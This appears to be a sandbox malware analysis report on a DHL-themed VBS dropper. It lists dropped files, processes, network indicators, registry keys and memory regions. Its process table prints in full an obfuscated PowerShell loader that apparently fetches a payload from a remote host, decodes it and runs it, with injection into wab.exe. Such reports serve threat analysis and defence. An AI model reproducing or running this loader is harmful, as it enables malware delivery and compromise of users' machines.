Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
DHL-9384915702.vbs
|
ASCII text, with very long lines (1995), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jilly03.0n4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_do3g3mpq.bnv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkurclzx.isf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suagtsb1.mpi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Bolthead.Lov
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL-9384915702.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 1
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping %.%.%.%
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c dir
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kerflap = 1;$Needgates='Substrin';$Needgates+='g';Function hierarchized($Extortion134){$Negering=$Extortion134.Length-$Kerflap;For($Anskydendes=5;
$Anskydendes -lt $Negering; $Anskydendes+=(6)){$Malemaade+=$Extortion134.$Needgates.Invoke($Anskydendes, $Kerflap);}$Malemaade;}function
Wauling($Dalasi){. ($Tiologiens) ($Dalasi);}$Ballsy=hierarchized ' bowmM Ang,o Het,zForbri UdvilWailslTids.aVisit/R.bor5Super..ilie0
Aand Proph(M nesW.upetiNonsunmedfldmist oStranwAkmitsTrips GrsgaNI.depTSkits Wam u1 tal 0Forst. Tige0Inter; und, SaalaWRespoiJambonNaadi6Sym
o4Lgsov;Overa BeweaxMetr 6 genz4Tombl;.omin RevierVelvev Vera:Terr 1Pe,so2 Snor1 Elit.Sente0 Samm)disor UdskyGForreeNiveac
Silkk I troYourn/Bisk 2F.rto0Geo,g1 Kret0 Solv0Paleo1,ortb0Negli1 A.pe onsFrntgeiHospirb,okmeMinisf devaoFrimnx Tes./ Fdes1snk,l2Selfe1Sge,r.
Daem0Neutr ';$brydningsvinkel=hierarchized 'AsienU ocisga,steLindrrHav,m- TromA.krivgSlvfee B,udnSaladt Figu ';$Valutasatsen=hierarchized
'GkanthBibeltBall,tT,werpSa.mm:Vig.r/Ov,rm/ Gru nAnde i Gg,htChurniLepidoTours.yintrcUnbe,o CleimInvok/Rus,ixMetad2Ge.ne/
Fr,mTSlethaDadairV.ndstIdiomaVegetrKondeeFigsh.Gide.curesuh campmHudaf ';$Udfyldningrs=hierarchized 'Slski>Par c ';$Tiologiens=hierarchized
' AaleiNoneveTame x verf ';$pseudotuberculosis = hierarchized 'ObdukeimponcDishahCrommotimet Frs.e% .rafaMorkepa,taipUdf id
P.ovaWxy stNit aa .imm%Gibel\ Tre.BPrvepo .hellFag ttHydrohIndfreVanesaHeterd nder.ForegLAlimeo LocuvSagfr Ulykk& Gesa& tes,
Succee Dia,c TriahOrganoBeret Co.j$ Skr ';Wauling (hierarchized 'Scapu$Tunhog Til.lPhleboSkrifbGolpna Butll P,rk:AggraSPheocaStrsknUdhuls
Starerygsvv ,ammeTilbyrRetsodLig.teGrssenHypere GranrStrkn5reakt5For,k=Bloka( tikpcMund mWeedidLight Solso/ P.uncRadbu Anti$Averap
Phl s por,etrokeuP ndrdOffero.emottFaglruFamilbVoicee Ove rBrugec.hokiuPapawl Bu.yoAfpres SnydiFlo.psGst,l)Guris ');Wauling
(hierarchized 'Ergon$Bef,lgRes rl Trsao.indsbfakleaSa mel,cabi:KaktuI tubenDeadlgOxamme,iskenHrdedi temmrGlorysStutsePeriekM,lluvIsraeeCelienKeepisMainpe.edventilb.s
Mode=Disun$S.ackV SlavaJailol ramuuFilistForseaextrasPaafuaGettatInt,rs NummeLinten Bash. Chyls R sepTundrlHemimiObskntAlarm(Hemia$.kjteUK,tapdUdenrfTabely
TelllCondydUdspinDerreiHensinScombgDuettrOvermsSk ue)R.fil ');$Valutasatsen=$Ingenirsekvensens[0];Wauling (hierarchized '
ferv$billeg A,drlF ldfoSph gbchitiaUnmisl Forv:PolitBPreaga CercrCorniyEftertPisheo B,shnOv,rjeForsprPrintnB.onfeSubak=HklenN
BlgeeBechawSk ld- g.noOKont bVverfj traneOstracOmst tRagn, Fr,gmSKredsy BrugsBeg,ntRumbaeInfirmBesgs.OpkobNautoteAlarmt Flos.BucciWBaldie.rranbCo
naCInitilbolteiTransena,adnC.ngot C iv ');Wauling (hierarchized ' Dkr.$ TidsB,ircua drogrCoagmyNon.ltSectvo SydynEu.opeCitr,rEngranCou
te M na.P.ectH Indle SkolaSammedaktsteSkoldr.henosAmatr[Karli$ReuphbFractr Til,yCivildStrafnPowdeiRadianCel.ugBesp,sOverbvP
nneiBalonnF.agrkSkr.ser eoplAtten] Kern= Blan$HematB bo.iaHel.el Encolbuyves OpslyGynom ');$Decos151=hierarchized ' reexB
Afk aBld,grFamily ConvtC,opfoUnde n Sk,ve Rep r,gvarnCho pe Fort.SnedkDfollooUdbudwGrampnPengel,ineloAnt aaThorodRrfleF Lagrinos.glLam
ie,rumf(Bog,r$C,rdoVUnpufa S.kilSlanguDermatSociaa SciesBondea IntetHasarsPerseeCom,enstyri,Super$ M,nsDSknliis raprDort.iharbogBil.ieSubsunSubcotFootlsO.ers)Upgos
';$Decos151=$Sanseverdener55[1]+$Decos151;$Dirigents=$Sanseverdener55[0];Wauling (hierarchized 'Hjdep$L.oncgHovedlLemogodispubFr.vraCaubelRabu.:OpskaU
DelfnKuldscLep,ooFairgmKamufehun.elOve,hiDeacilAarspy Frug6Figur1Oleom=Recip(GenneTM sgieBurghsIndkntT efa-RacewP,illsa E,entEpitrhAnacr
Knska$c,itrD.nnueiT.lskrhorolistatugStr,neTo aynMeritt SildsUnsal) Terr ');while (!$Uncomelily61) {Wauling (hierarchized '
stoc$forhugMaur.lRumaeoD svebFrysea lgellHjtel:,lawecEkspeoProp,n CycadOctavoUnspaeVanges L,na= Regi$ OlaitLyrifrformuuSubrueTotte
') ;Wauling $Decos151;Wauling (hierarchized 'Hi deSTredjtFrednaA prirSmasktRecep-Sade SMut,llChelyeAghaseTh rmpBrode Anti,4Senen
');Wauling (hierarchized ' Spec$Anthrg solilDefekocommobSheeta Tek.lT.ppe:PandaUExpu,nMi,cocPostsoQuad.mLuci eGondolFi,vaiNaboilnatioyGlyce6
Hone1Dubli=Archk(MagisTTilpreViviasRustntBache-RensePHabilaJernbtPlig.hFr,nk Propo$ arnDAffali T perSne kiSidstg ,dbye,tgaanBriartfu
arsKkken) .org ') ;Wauling (hierarchized 'Fourn$UegengMultilOpenhoFaellbDarksaQuittlSkoli:TeknifSerieo.ctahrDevial Jubiy Diams
telftJensle Dradl,verts StereKraftskurves uctit DampePeo,ldStilbeAbortru,dernHomote Dest=Lukni$S,debgMatr,lDialyo Ddlkb.iropaArb.jlUntre:
PapiU K.rtnlovprepianilSnigliSpoejcStegeiArsentPr.deeSnegldSykl,+Loc p+overd%.onvi$SedatISpendnAvilegAtomie BetrnUsantiFinevrVirkesDaadleAmn,okUnbrovNoncaeCamelnKnst,sBlysteProctnSpi,ds
Sedu.ThackcVa dfoHendeuMik onR.surt kree ') ;$Valutasatsen=$Ingenirsekvensens[$forlystelsesstederne];}Wauling (hierarchized
'Sikke$OmkomgSyst lVisiooBagreb KystaSubdolB,ass:RituaM Ene.iSpindcPolysrSkrupoMarcobAureoiCa saoUnsantPreapaPaalg ,ead=Child
Mon gGAnaleeIden.t elte-atuneCBr gto Gen,n eprotUncoueMalvan ,ftetst.nk Paas$MagteD Un.tiTransrUdtr.iHjlpegVocale ollnOpdrit
UsassUnadd ');Wauling (hierarchized 'Bogkb$Formag VrtelBathyoC.boobCanula Supel ust:KompaBSangletrop,a,hicka MentnFestsd
Afb.iModvinSej,sg nskeeFloccrReguln Luk e Fi,a Klim.=Overm Farol[ awaiSSilveyUnbotsB oketLunkheIngram Hove.misceC VansoHalvenA,rydvPteroe
anosrMen.atExe u]Vared:Fase.:N,stoFEddierA,stdoUntrumHaandBpers,aDyrtisTeksteProun6Foder4 GkkeSM.rget Sfyrr Kon.i S.enn DepugHalsh(
Mang$Po osMGuny,iUndevcFrancrBerapoFrdi,b V,idiHutiaoCre ktKryptaLithe)Runds ');Wauling (hierarchized 'E olu$Fejebg fogelBekraoAccenb
BotaaDespolSvale:AnchoND.absyUnba.d ThuseWarr,rDow lsSkrae Shoo=Spic, Sprr.[AmbulSSpectypatensAarsttDim,teMorfim shan.SlageTOrg,neRankrxEuphot
olos.GulvhECo.ntn hidsc AnaloDaterdRecauiC,mmenEn aggBypas]and.a:Jensm:Hvn nAbarahS EstaCSusanI streISahhb.tr.ioG OutfeMembrt
SupeSFrotat OutrrM,hoeiPeri,n Bestgamen ( ast$InsolBBasisePlkniaFarveaveinsnJungldtelegiDispln.attegDorype,omstrLizi n SymmeJutta)tofte
');Wauling (hierarchized 'Civi,$ PaavgHyklelSkrupoO,erpbBoydpaNoncllShake:U derEBlod kKonkrs Apaca Co.lm Unarea,vesnDemon=,tege$SundeN
Mi.wyPallad J.steUvildrM.ctusAte i.DobbesGingluKartebUdlanskvdentKran,r Fiksi NonanStyrigHinke(Corde3Agast0Bajon8Phpov0Mantl9D,ane7
Reky,En,il2Diste9 gend6 Lsni6Sdest1K sne)Udk.n ');Wauling $Eksamen;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bolthead.Lov && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kerflap = 1;$Needgates='Substrin';$Needgates+='g';Function hierarchized($Extortion134){$Negering=$Extortion134.Length-$Kerflap;For($Anskydendes=5;
$Anskydendes -lt $Negering; $Anskydendes+=(6)){$Malemaade+=$Extortion134.$Needgates.Invoke($Anskydendes, $Kerflap);}$Malemaade;}function
Wauling($Dalasi){. ($Tiologiens) ($Dalasi);}$Ballsy=hierarchized ' bowmM Ang,o Het,zForbri UdvilWailslTids.aVisit/R.bor5Super..ilie0
Aand Proph(M nesW.upetiNonsunmedfldmist oStranwAkmitsTrips GrsgaNI.depTSkits Wam u1 tal 0Forst. Tige0Inter; und, SaalaWRespoiJambonNaadi6Sym
o4Lgsov;Overa BeweaxMetr 6 genz4Tombl;.omin RevierVelvev Vera:Terr 1Pe,so2 Snor1 Elit.Sente0 Samm)disor UdskyGForreeNiveac
Silkk I troYourn/Bisk 2F.rto0Geo,g1 Kret0 Solv0Paleo1,ortb0Negli1 A.pe onsFrntgeiHospirb,okmeMinisf devaoFrimnx Tes./ Fdes1snk,l2Selfe1Sge,r.
Daem0Neutr ';$brydningsvinkel=hierarchized 'AsienU ocisga,steLindrrHav,m- TromA.krivgSlvfee B,udnSaladt Figu ';$Valutasatsen=hierarchized
'GkanthBibeltBall,tT,werpSa.mm:Vig.r/Ov,rm/ Gru nAnde i Gg,htChurniLepidoTours.yintrcUnbe,o CleimInvok/Rus,ixMetad2Ge.ne/
Fr,mTSlethaDadairV.ndstIdiomaVegetrKondeeFigsh.Gide.curesuh campmHudaf ';$Udfyldningrs=hierarchized 'Slski>Par c ';$Tiologiens=hierarchized
' AaleiNoneveTame x verf ';$pseudotuberculosis = hierarchized 'ObdukeimponcDishahCrommotimet Frs.e% .rafaMorkepa,taipUdf id
P.ovaWxy stNit aa .imm%Gibel\ Tre.BPrvepo .hellFag ttHydrohIndfreVanesaHeterd nder.ForegLAlimeo LocuvSagfr Ulykk& Gesa& tes,
Succee Dia,c TriahOrganoBeret Co.j$ Skr ';Wauling (hierarchized 'Scapu$Tunhog Til.lPhleboSkrifbGolpna Butll P,rk:AggraSPheocaStrsknUdhuls
Starerygsvv ,ammeTilbyrRetsodLig.teGrssenHypere GranrStrkn5reakt5For,k=Bloka( tikpcMund mWeedidLight Solso/ P.uncRadbu Anti$Averap
Phl s por,etrokeuP ndrdOffero.emottFaglruFamilbVoicee Ove rBrugec.hokiuPapawl Bu.yoAfpres SnydiFlo.psGst,l)Guris ');Wauling
(hierarchized 'Ergon$Bef,lgRes rl Trsao.indsbfakleaSa mel,cabi:KaktuI tubenDeadlgOxamme,iskenHrdedi temmrGlorysStutsePeriekM,lluvIsraeeCelienKeepisMainpe.edventilb.s
Mode=Disun$S.ackV SlavaJailol ramuuFilistForseaextrasPaafuaGettatInt,rs NummeLinten Bash. Chyls R sepTundrlHemimiObskntAlarm(Hemia$.kjteUK,tapdUdenrfTabely
TelllCondydUdspinDerreiHensinScombgDuettrOvermsSk ue)R.fil ');$Valutasatsen=$Ingenirsekvensens[0];Wauling (hierarchized '
ferv$billeg A,drlF ldfoSph gbchitiaUnmisl Forv:PolitBPreaga CercrCorniyEftertPisheo B,shnOv,rjeForsprPrintnB.onfeSubak=HklenN
BlgeeBechawSk ld- g.noOKont bVverfj traneOstracOmst tRagn, Fr,gmSKredsy BrugsBeg,ntRumbaeInfirmBesgs.OpkobNautoteAlarmt Flos.BucciWBaldie.rranbCo
naCInitilbolteiTransena,adnC.ngot C iv ');Wauling (hierarchized ' Dkr.$ TidsB,ircua drogrCoagmyNon.ltSectvo SydynEu.opeCitr,rEngranCou
te M na.P.ectH Indle SkolaSammedaktsteSkoldr.henosAmatr[Karli$ReuphbFractr Til,yCivildStrafnPowdeiRadianCel.ugBesp,sOverbvP
nneiBalonnF.agrkSkr.ser eoplAtten] Kern= Blan$HematB bo.iaHel.el Encolbuyves OpslyGynom ');$Decos151=hierarchized ' reexB
Afk aBld,grFamily ConvtC,opfoUnde n Sk,ve Rep r,gvarnCho pe Fort.SnedkDfollooUdbudwGrampnPengel,ineloAnt aaThorodRrfleF Lagrinos.glLam
ie,rumf(Bog,r$C,rdoVUnpufa S.kilSlanguDermatSociaa SciesBondea IntetHasarsPerseeCom,enstyri,Super$ M,nsDSknliis raprDort.iharbogBil.ieSubsunSubcotFootlsO.ers)Upgos
';$Decos151=$Sanseverdener55[1]+$Decos151;$Dirigents=$Sanseverdener55[0];Wauling (hierarchized 'Hjdep$L.oncgHovedlLemogodispubFr.vraCaubelRabu.:OpskaU
DelfnKuldscLep,ooFairgmKamufehun.elOve,hiDeacilAarspy Frug6Figur1Oleom=Recip(GenneTM sgieBurghsIndkntT efa-RacewP,illsa E,entEpitrhAnacr
Knska$c,itrD.nnueiT.lskrhorolistatugStr,neTo aynMeritt SildsUnsal) Terr ');while (!$Uncomelily61) {Wauling (hierarchized '
stoc$forhugMaur.lRumaeoD svebFrysea lgellHjtel:,lawecEkspeoProp,n CycadOctavoUnspaeVanges L,na= Regi$ OlaitLyrifrformuuSubrueTotte
') ;Wauling $Decos151;Wauling (hierarchized 'Hi deSTredjtFrednaA prirSmasktRecep-Sade SMut,llChelyeAghaseTh rmpBrode Anti,4Senen
');Wauling (hierarchized ' Spec$Anthrg solilDefekocommobSheeta Tek.lT.ppe:PandaUExpu,nMi,cocPostsoQuad.mLuci eGondolFi,vaiNaboilnatioyGlyce6
Hone1Dubli=Archk(MagisTTilpreViviasRustntBache-RensePHabilaJernbtPlig.hFr,nk Propo$ arnDAffali T perSne kiSidstg ,dbye,tgaanBriartfu
arsKkken) .org ') ;Wauling (hierarchized 'Fourn$UegengMultilOpenhoFaellbDarksaQuittlSkoli:TeknifSerieo.ctahrDevial Jubiy Diams
telftJensle Dradl,verts StereKraftskurves uctit DampePeo,ldStilbeAbortru,dernHomote Dest=Lukni$S,debgMatr,lDialyo Ddlkb.iropaArb.jlUntre:
PapiU K.rtnlovprepianilSnigliSpoejcStegeiArsentPr.deeSnegldSykl,+Loc p+overd%.onvi$SedatISpendnAvilegAtomie BetrnUsantiFinevrVirkesDaadleAmn,okUnbrovNoncaeCamelnKnst,sBlysteProctnSpi,ds
Sedu.ThackcVa dfoHendeuMik onR.surt kree ') ;$Valutasatsen=$Ingenirsekvensens[$forlystelsesstederne];}Wauling (hierarchized
'Sikke$OmkomgSyst lVisiooBagreb KystaSubdolB,ass:RituaM Ene.iSpindcPolysrSkrupoMarcobAureoiCa saoUnsantPreapaPaalg ,ead=Child
Mon gGAnaleeIden.t elte-atuneCBr gto Gen,n eprotUncoueMalvan ,ftetst.nk Paas$MagteD Un.tiTransrUdtr.iHjlpegVocale ollnOpdrit
UsassUnadd ');Wauling (hierarchized 'Bogkb$Formag VrtelBathyoC.boobCanula Supel ust:KompaBSangletrop,a,hicka MentnFestsd
Afb.iModvinSej,sg nskeeFloccrReguln Luk e Fi,a Klim.=Overm Farol[ awaiSSilveyUnbotsB oketLunkheIngram Hove.misceC VansoHalvenA,rydvPteroe
anosrMen.atExe u]Vared:Fase.:N,stoFEddierA,stdoUntrumHaandBpers,aDyrtisTeksteProun6Foder4 GkkeSM.rget Sfyrr Kon.i S.enn DepugHalsh(
Mang$Po osMGuny,iUndevcFrancrBerapoFrdi,b V,idiHutiaoCre ktKryptaLithe)Runds ');Wauling (hierarchized 'E olu$Fejebg fogelBekraoAccenb
BotaaDespolSvale:AnchoND.absyUnba.d ThuseWarr,rDow lsSkrae Shoo=Spic, Sprr.[AmbulSSpectypatensAarsttDim,teMorfim shan.SlageTOrg,neRankrxEuphot
olos.GulvhECo.ntn hidsc AnaloDaterdRecauiC,mmenEn aggBypas]and.a:Jensm:Hvn nAbarahS EstaCSusanI streISahhb.tr.ioG OutfeMembrt
SupeSFrotat OutrrM,hoeiPeri,n Bestgamen ( ast$InsolBBasisePlkniaFarveaveinsnJungldtelegiDispln.attegDorype,omstrLizi n SymmeJutta)tofte
');Wauling (hierarchized 'Civi,$ PaavgHyklelSkrupoO,erpbBoydpaNoncllShake:U derEBlod kKonkrs Apaca Co.lm Unarea,vesnDemon=,tege$SundeN
Mi.wyPallad J.steUvildrM.ctusAte i.DobbesGingluKartebUdlanskvdentKran,r Fiksi NonanStyrigHinke(Corde3Agast0Bajon8Phpov0Mantl9D,ane7
Reky,En,il2Diste9 gend6 Lsni6Sdest1K sne)Udk.n ');Wauling $Eksamen;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bolthead.Lov && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://api.ipify.org/
|
104.26.13.205
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://nitio.com/x2/Tartare.chmP
|
unknown
|
||
|
http://nitio.com/x1/NdiheD197.bin
|
192.185.13.24
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://nitio.com
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://nitio.com/x2/Tartare.chm
|
192.185.13.24
|
There are 6 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
concaribe.com
|
192.185.13.234
|
|
|
|
ftp.concaribe.com
|
unknown
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
nitio.com
|
192.185.13.24
|
||
|
api.ipify.org
|
104.26.13.205
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.185.13.234
|
concaribe.com
|
United States
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
192.185.13.24
|
nitio.com
|
United States
|
||
|
104.26.13.205
|
api.ipify.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
291B6B81000
|
trusted library allocation
|
page read and write
|
|
|
|
C596000
|
direct allocation
|
page execute and read and write
|
|
|
|
257FB000
|
trusted library allocation
|
page read and write
|
|
|
|
257D1000
|
trusted library allocation
|
page read and write
|
|
|
|
8B10000
|
direct allocation
|
page execute and read and write
|
|
|
|
5D65000
|
trusted library allocation
|
page read and write
|
|
|
|
23B281BD000
|
heap
|
page read and write
|
||
|
4B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C5D000
|
trusted library allocation
|
page read and write
|
||
|
75CF000
|
stack
|
page read and write
|
||
|
23B27C70000
|
remote allocation
|
page read and write
|
||
|
23B28298000
|
heap
|
page read and write
|
||
|
2845E000
|
stack
|
page read and write
|
||
|
277F7000
|
heap
|
page read and write
|
||
|
24F4E000
|
stack
|
page read and write
|
||
|
291BEF5C000
|
heap
|
page read and write
|
||
|
23B281BD000
|
heap
|
page read and write
|
||
|
27807000
|
heap
|
page read and write
|
||
|
79F0000
|
trusted library allocation
|
page read and write
|
||
|
79C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
23B28229000
|
heap
|
page read and write
|
||
|
23B27C70000
|
remote allocation
|
page read and write
|
||
|
2F0C000
|
heap
|
page read and write
|
||
|
23B282A8000
|
heap
|
page read and write
|
||
|
28500000
|
trusted library allocation
|
page read and write
|
||
|
4FA98FE000
|
stack
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
25450000
|
trusted library allocation
|
page read and write
|
||
|
277C4000
|
heap
|
page read and write
|
||
|
7618000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
796E000
|
stack
|
page read and write
|
||
|
23B28492000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
98F0000
|
heap
|
page read and write
|
||
|
4A7F000
|
stack
|
page read and write
|
||
|
27C90000
|
trusted library allocation
|
page read and write
|
||
|
251E0000
|
direct allocation
|
page read and write
|
||
|
23B284AE000
|
heap
|
page read and write
|
||
|
27C48000
|
trusted library allocation
|
page read and write
|
||
|
23B28232000
|
heap
|
page read and write
|
||
|
257F9000
|
trusted library allocation
|
page read and write
|
||
|
23B28482000
|
heap
|
page read and write
|
||
|
291A7143000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
23B28180000
|
heap
|
page read and write
|
||
|
23B28292000
|
heap
|
page read and write
|
||
|
250FF000
|
stack
|
page read and write
|
||
|
23B2814C000
|
heap
|
page read and write
|
||
|
257CD000
|
trusted library allocation
|
page read and write
|
||
|
23B28492000
|
heap
|
page read and write
|
||
|
9BF0000
|
direct allocation
|
page read and write
|
||
|
7A00000
|
trusted library allocation
|
page read and write
|
||
|
23B282A8000
|
heap
|
page read and write
|
||
|
250BE000
|
stack
|
page read and write
|
||
|
23B2833F000
|
heap
|
page read and write
|
||
|
D996000
|
direct allocation
|
page execute and read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
28530000
|
trusted library allocation
|
page read and write
|
||
|
23B283A9000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
23B2811F000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
8490000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
1C673700000
|
heap
|
page read and write
|
||
|
7190000
|
direct allocation
|
page read and write
|
||
|
23B2834D000
|
heap
|
page read and write
|
||
|
291BF047000
|
heap
|
page read and write
|
||
|
9ACA000
|
heap
|
page read and write
|
||
|
7742000
|
heap
|
page read and write
|
||
|
49D0000
|
trusted library allocation
|
page read and write
|
||
|
23B262EA000
|
heap
|
page read and write
|
||
|
23B2826C000
|
heap
|
